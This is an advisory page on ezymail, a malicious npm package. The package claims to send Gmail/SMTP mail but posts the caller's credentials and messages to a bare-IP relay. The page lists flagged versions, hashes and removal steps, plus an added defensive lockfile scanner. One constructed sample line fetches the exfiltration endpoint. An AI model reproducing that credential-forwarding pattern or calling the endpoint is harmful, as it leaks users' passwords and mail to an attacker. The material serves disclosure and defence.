Malicious package

ezymail (npm)

Malicious code in ezymail (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4557
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall ezymail

What this malware does

The package advertises itself as a Gmail/SMTP sender library. The README documents that callers pass their SMTP user and pass (Gmail App Password) to a send() function that talks SMTP/TLS directly to the user's mail server. In reality, index.js (the package main) does not use the bundled lib/mailer.js SMTP implementation at all. Instead, send() spreads the caller-supplied data (including user, pass, from, to, subject, and body) into a JSON payload and POSTs it to http://54.90.254.81:3000/send over cleartext HTTP (index.js lines 7-22). lib/mailer.js exists as decoy code matching the README's 'How It Works' section but is only imported by server.js, the attacker's relay server, never by the package main. Every consumer following the documented usage hands their Gmail address and App Password — plus all recipient addresses and message content — to a bare-IP endpoint over plaintext HTTP on first call to the package's advertised API.
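A defender-side check for the behaviour described above, added here as an example (it is not code from the advisory or from the ezymail package): it lists every ezymail entry in a package-lock.json, marking the flagged versions, and tests a source string for the bare-IP endpoint named in the advisory. Both lockfile layouts are handled (the lockfileVersion 2/3 `packages` map and the lockfileVersion 1 nested `dependencies` tree). The sample lockfile and source snippet are constructed; the nested `9.9.9` entry is a hypothetical version used only to show the unflagged case.

```javascript
// Added example, not from the advisory or the ezymail package.
// Flagged versions and the exfiltration host are taken from the advisory text.
const FLAGGED_VERSIONS = new Set(['2.0.2', '2.0.4', '2.0.5', '2.0.6', '2.0.8', '3.0.0']);
const EXFIL_HOST = '54.90.254.81'; // bare-IP relay the package POSTs credentials to

// Returns [{ path, version, flagged }] for every ezymail entry in a lockfile object.
function findEzymailEntries(lock) {
  const hits = [];
  const record = (path, version) =>
    hits.push({ path, version, flagged: FLAGGED_VERSIONS.has(version) });

  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path; "" is the root project
    for (const [key, meta] of Object.entries(lock.packages)) {
      if (key !== '' && meta && /(^|\/)node_modules\/ezymail$/.test(key)) {
        record(key, meta.version);
      }
    }
  } else {
    // lockfileVersion 1: nested "dependencies" objects, walked recursively
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        const path = `${prefix}node_modules/${name}`;
        if (name === 'ezymail') record(path, meta.version);
        if (meta.dependencies) walk(meta.dependencies, `${path}/`);
      }
    };
    walk(lock.dependencies, '');
  }
  return hits;
}

// True if the source text references the exfiltration host (scheme and port optional).
function referencesExfilHost(source) {
  // escape the dots so "54.90.254.81" cannot match "54x90x254x81"
  const re = new RegExp(EXFIL_HOST.replace(/\./g, '\\.'));
  return re.test(source);
}

// Human-readable report lines for a lockfile object.
function reportLockfile(lock) {
  return findEzymailEntries(lock).map(
    (h) => `${h.flagged ? 'FLAGGED' : 'ok'} ${h.path}@${h.version}`
  );
}

// Constructed sample lockfile (lockfileVersion 3 layout). The 9.9.9 copy is hypothetical.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { ezymail: '^2.0.0' } },
    'node_modules/ezymail': { version: '2.0.6' },
    'node_modules/some-lib': { version: '1.0.0' },
    'node_modules/some-lib/node_modules/ezymail': { version: '9.9.9' },
  },
};

// Constructed source snippet with the endpoint the advisory names (not the real index.js).
const SAMPLE_SOURCE = "await fetch('http://54.90.254.81:3000/send', { method: 'POST' })";

// Demo run against the constructed inputs.
for (const line of reportLockfile(SAMPLE_LOCK)) console.log(line);
console.log('source references exfil host:', referencesExfilHost(SAMPLE_SOURCE));
```

To run it against a real project, parse the lockfile with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` and pass the result to `reportLockfile`; any `FLAGGED` line means the package must be removed and every secret the build or runtime could reach rotated, as the advisory instructs.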

Malicious versions

6 flagged

2.0.2, 2.0.4, 2.0.5, 2.0.6, 2.0.8, 3.0.0

Indicators of compromise (SHA-256)

68368df4bdb4b3db2be822a508ff596ca7af0f74c0cbf9e8137426a66933900e
73ac73ac3571e19c5124da7423f66b9de2d99956ea07518b430d0a6393716424
a10e677af3dda40bc569ecdac08d36a73fc29fbdf1ba170538076a83cbab263e
daae0def10869ec69e0029757598c30dd99b3f27a2e38b5e84fc356a55de8dd8
ea463f516048086ec4acfc2733edc9561dac749d19c2e47381fc170c451cd53c
ad9bcfcddac468f20e74e2cdc0c5dca674ae1462ac42f5efca18766fa333d224

Frequently asked questions

No. ezymail on npm has been identified as a malicious package (versions 2.0.2, 2.0.4, 2.0.5, 2.0.6, 2.0.8, 3.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

  • IN-MAL-2026-003429
  • IN-MAL-2026-003804
  • IN-MAL-2026-003391
  • IN-MAL-2026-003441
  • IN-MAL-2026-003428
  • IN-MAL-2026-006087

Credits

  • Amazon Inspector · finder

ezymail (npm) malicious package — MAL-2026-4557 | O3 Security